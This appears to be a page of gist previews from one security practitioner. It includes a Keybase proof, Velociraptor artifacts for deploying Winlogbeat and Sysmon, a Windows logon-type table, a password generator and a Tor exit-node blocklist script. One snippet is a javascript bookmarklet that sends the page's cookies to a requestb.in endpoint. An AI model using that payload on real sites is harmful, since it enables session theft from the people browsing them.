I hereby claim:
- I am ecapuano on github.
- I am ecapuano (https://keybase.io/ecapuano) on keybase.
- I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B
To claim this, I am signing this object:
name: Custom.Winlogbeat.Deploy | |
description: | | |
Quick and dirty way to deploy Winlogbeat via Velociraptor | |
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
type: CLIENT | |
parameters: | |
- name: binaryURL | |
default: http://url.to/winlogbeat.exe | |
- name: installPath | |
default: C:\Program Files\winlogbeat |
name: Custom.CapsSysmon.Deploy | |
description: | | |
A quick and dirty way to download and install sysmon via Velociraptor | |
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
type: CLIENT | |
parameters: | |
- name: sysmonURL | |
default: http://url.to/sysmon8_64.exe | |
- name: binPath | |
default: C:\sysmon.exe |
id | description | |
---|---|---|
2 | Interactive (logon at keyboard and screen of system) | |
3 | Network (i.e. connection to shared folder on this computer from elsewhere on network) | |
4 | Batch (i.e. scheduled task) | |
5 | Service (Service startup) | |
7 | Unlock (i.e. unlocking unnattended workstation) | |
8 | NetworkCleartext (Logon with credentials sent in the clear text.) | |
9 | NewCredentials such as with RunAs or mapping a network drive with alternate credentials. | |
10 | RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance) | |
11 | CachedInteractive (logon with cached domain credentials) |
# character set to use for generating passwords | |
chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$% | |
# how many passwords to generate | |
count=100 | |
n=0 | |
while [ $n -le $count ] ; do | |
for i in {1..12} ; do #### 12 defines the max size of the passwords |
javascript:var img = document.createElement('img'); | |
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie; |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
# | |
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good. | |
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc... | |
# | |
curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt |